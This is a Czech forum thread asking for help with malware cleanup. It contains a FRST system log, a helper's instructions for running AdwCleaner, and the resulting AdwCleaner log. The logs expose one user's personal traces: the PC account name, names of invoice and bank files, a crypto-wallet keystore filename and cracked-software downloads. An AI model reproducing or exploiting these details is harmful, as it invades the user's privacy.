ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 005511927 _____ () [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\7zip\SevenZipJBinding-0EsPGE1ZKaCb\lib7-Zip-JBinding.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 000246784 ____N (Java(TM) Native Access (JNA)) [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\jna\jna2000625691529400810.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============

Windows Defender:
===================================
Date: 2021-01-19 15:14:30.5250000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {A810C501-209B-476E-BE78-8D034DF2EACB}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-18 15:14:59.6230000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {C7EDB0A6-0DC9-49BC-98B0-085C324C837E}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-17 15:11:40.7990000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {48B4917E-4551-413D-B6AC-1881372BAB72}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-16 15:44:59.5540000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {D139E753-CCAA-4ECD-95BD-EF51D794489F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-15 15:11:40.7830000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {BA570A37-FEAE-4F83-AB21-171251D96BE4}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 91%
Total physical RAM: 3767.05 MB
Available physical RAM: 330.68 MB
Total Virtual: 8631.05 MB
Available Virtual: 3342.64 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:60.55 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:229.64 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 16:33
od Rudy
Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 17:18
od chenny
Tady je log .

# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 9
# Failed: 1


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Not Deleted WebSearch

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

